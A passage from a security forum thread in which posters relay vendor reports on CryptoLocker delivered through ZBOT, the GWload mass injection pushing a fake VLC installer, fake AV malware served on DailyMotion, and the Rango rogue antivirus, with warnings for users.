Once this attached file is executed, it connects to a URL to download another file, which is saved as cjkienn.exe (detected as  TSPY_ZBOT.VNA). This malware then downloads the actual CryptoLocker malware (detected as TROJ_CRILOCK.NS).
(CryptoLocker infection chain)
> http://blog.trendmic...lock_edited.jpg
This threat is particularly troublesome for several reasons. First, ZeuS/ZBOT variants are known to steal information related to online banking credentials. The attackers can use the stolen information to start unauthorized banking transactions. Furthermore, because of the CryptoLocker malware, users will be unable to access their personal or important documents... Although the ransom note only in CryptoLocker specifies “RSA-2048” as the encryption used, our analysis shows that the malware uses AES + RSA encryption. RSA is asymmetric key cryptography, which means it uses two keys. One key is used to encrypt the data and another is used to decrypt the data. (One key is made available to any outside party and is called the public key; the other key is kept by the user and is called the private key.) AES uses symmetric keys (i.e., the same key is used to encrypt and decrypt information). The malware uses an AES key to encrypt files.  The AES key for decryption is written in the files encrypted by the malware. However, this key is encrypted with an RSA public key embedded in the malware, which means that a private key is needed to decrypt it. Unfortunately, the said private key is not available. For information on which files are encrypted, users can check their system’s autostart registry.
> http://blog.trendmic...ryptolocker.jpg
... It is also important for users to be cautious when opening any attachments from email messages coming from unknown sources. Email reputation service also blocks the spam related to this threat."
 

:ph34r: :ph34r:


Edited by AplusWebMaster, 24 October 2013 - 10:21 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#43 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 29 October 2013 - 07:13 AM

FYI...

GWload - Mass Injection making its rounds ...
- http://community.web...its-rounds.aspx
29 Oct 2013 - "... a new mass injection campaign is making its rounds, compromising and injecting content into tens of thousands of legitimate websites... Our telemetry shows that, to date, at least 40,000 compromised pages have occurred on the Web, redirecting and tricking users to install rogue software. We see parallels of the injected websites with websites that were affected by the "cookiebomb" mass injection, which was mostly associated with delivering "ransomware" payloads...
Number of injected web pages spotted in the last 7 days:
> http://community.web...7_5F00_days.jpg
Users who browse to a compromised injected website are immediately redirected 'drive-by' style to a second compromised website that (a) effectively blocks all content of the legitimate website and (b) shows them this notification: "VLC player is required for this website, click DOWNLOAD NOW". VLC media player is a legitimate open source media player (the official page is located here*). However, VLC player is also known to be abused and bundled with some non-legitimate software, and this is the case with -all- the "VLC media player" installations that take part in this mass injection campaign... The lure - how content is 'locked' with conditional access; this is what the user sees when browsing to an injected website:
> http://community.web...plashscreen.jpg
... If a user is convinced that it is necessary to download and run the file to access the website's content, then unexpected, -rogue- installations of software will commence on the user's machine... Looks like "VLC Player" Installation, but the small print allows for some extras:
> http://community.web...splashcreen.jpg
... We noticed that this mass injection uses a social engineering trick that locks legitimate websites' content to lure potential victims to install applications that participate in Cost Per Action (CPA) advertising schemes. This change in tactics that occurred in the past two weeks coincides with the arrest of the Blackhole Exploit Kit author 'Paunch,' which could suggest that actors adapt to change rapidly to keep their attack going. It was also apparent that certain scripts used by actors to serve social engineering-based attack vectors are interchangeable across different attack platforms; we witnessed with 'GWload' that code that mostly was used in social engineering-based attacks on -Facebook- has now migrated and is used with mass injections..."
* http://www.videolan.org/
 

:grrr: :ph34r:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#44 sandra lora

sandra lora

    Member

  • Full Member
  • Pip
  • 5 posts

Posted 22 November 2013 - 05:35 AM

Those scam ware often sends spam email to your email box, the links inside the emails are often infected with virus. If you receive the spam emails, you'd better not open them or click the links, otherwise your PC will easily be infected.



#45 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 01 February 2014 - 06:59 AM

FYI...

DailyMotion infected - serving Fake AV Malware
- http://threatpost.co...-malware/104003
Jan 31, 2014 - "More than three weeks after notifying video-sharing site DailyMotion that it was compromised, security company Invincea reports the popular website is -still- infected. A spokesperson told Threatpost that Invincea’s original notification was not acknowledged and the company suspects this is a continuation of the same attack and the site was never cleaned up. Invincea said it has again notified DailyMotion, which is the 96th most popular destination on the Internet according to Alexa. The site allows users to upload and share videos. The attack was originally reported Jan. 7* when malicious ads were discovered on the site. Those ads were -redirecting- visitors to a fake AV scam. Invincea said today** that the same threat is happening on the site... a visitor is presented with a dialog box warning the user that “Microsoft Antivirus” found a problem on the victim’s computer and that it needs to be cleaned. A list of potential problems is shown next and the user is enticed to run an executable pretending to be security software... With fake AV scams, victims are tricked into installing what they think is security software but is instead malware. They’re then informed they must purchase a subscription of some kind in order to clean the computer of the infection..."
* http://www.invincea....fake-av-threat/
Jan 7, 2014

** http://www.invincea....-fakeav-threat/
Jan 31, 2014

 

FakeAV Threat ...
- https://www.youtube....xKmAsSzJv0#t=38
Jan 31, 2014 Video 1:26
 

93.115.82.246
- https://www.virustot...46/information/

2014-02-04
___

- https://net-security...ews.php?id=2697
Feb 3, 2014 - "... Not only do the victims get saddled with malware, but they are likely to pay for the "full version" of the fake AV (some $100) and have their credit card details stolen in the process... the malware served in this attack is still detected only by a handful of commercial AV solutions, so avoiding DailyMotion's website is a good idea for now."
 

:ph34r: :ph34r: :grrr:


Edited by AplusWebMaster, 04 February 2014 - 11:23 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#46 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 31 October 2014 - 09:31 PM

FYI...

Rogue AV still finds a niche...
- http://www.threattra...ll-finds-niche/
Oct 31, 2014 - "... recently observed the Asprox botnet distributing malicious spam – like the image below of a purported WhatsApp voicemail notification – with attachments infected with Kuluoz, a downloader for Asprox, that is used to drop affiliate payloads onto PCs.
WhatsApp spam delivers Kuluoz downloader dropping Rango Rogue AV:
> http://www.threattra...atsApp-Spam.jpg
Kuluoz dropping Rango - rogue AV from the Fakerean family of rogues:
> http://www.threattra...4/10/Rango1.png
Once infected with Rango – which can dynamically change its name depending on the OS environment in which it is installed – it will begin alerting users that their machine is infected with malware and directing them to purchase Rango.
Rango generates dire warnings designed to scare users into purchasing false protection:
> http://www.threattra...4/10/Rango3.png
Victims who make it this far - hand over their credit card information...:
> http://www.threattra...4/10/Rango4.png
Rango even goes as far as to create a fake Windows Action Screen to help persuade users into accepting it as a recognized and trusted antivirus program... Rango also stops users from running applications, falsely claiming they are malicious... users who mistakenly -pay- the ransom for Fakerean rogues typically download an .exe file which removes any fake files and stops blocking access to applications. Subsequent “scans” with the rogue typically will not show any future false detections. A ThreatAnalyzer dynamic malware analysis report of Rango is available here*."
* http://www.threattra...is-fakerean.pdf
 

:ph34r:  :grrr:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.





3 user(s) are reading this topic

0 members, 2 guests, 0 anonymous users


    Bing (1)
Member of ASAP and UNITE
Support SpywareInfo Forum - click the button